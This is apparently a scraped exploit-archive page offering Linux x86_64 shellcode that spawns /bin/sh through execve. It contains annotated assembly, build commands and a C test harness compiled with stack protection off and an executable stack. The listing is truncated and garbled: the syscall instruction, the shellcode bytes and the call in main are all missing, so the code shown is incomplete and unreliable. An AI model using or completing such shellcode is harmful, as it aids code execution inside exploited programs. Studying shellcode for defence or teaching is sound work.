Linux/x86_64 execve(/bin/sh) shellcode (22 bytes) Vulnerability / Exploit
Exploits / Vulnerability Discovered : 2019-06-18 |
Type : shellcode |
Platform : linux_x86-64
This exploit / vulnerability Linux/x86_64 execve(/bin/sh) shellcode (22 bytes) is for educational purposes only and if it is used you will do on your own risk!
Title: Linux/x86_64 - execve(/bin/sh) (22 bytes)
;Author: Aron Mihaljevic
;Architecture: Linux x86_64
;Shellcode Length: 22 bytes
;github =
global _start
section .text
;int execve(const char *filename, char *const argv[],char *const envp[])
xor rsi, rsi ;clear rsi
push rsi ;push null on the stack
mov rdi, 0x68732f2f6e69622f ;/bin//sh in reverse order
push rdi
push rsp
pop rdi ;stack pointer to /bin//sh
mov al, 59 ;sys_execve
cdq ;sign extend of eax
=======Generate Shellcode==========================================
nasm -felf64 spawn_shell.nasm -o spawn_shell.o
ld spawn_shell.o -o spawn_shell
=========generate C program to exploit=============================
gcc -fno-stack-protector -z execstack shell.c -o shell
#include <stdio.h>
#include <string.h>
unsigned char code[]= \
int main(){
printf("length of your shellcode is: %d\n", (int)strlen(code));
int (*ret)() = (int(*)())code;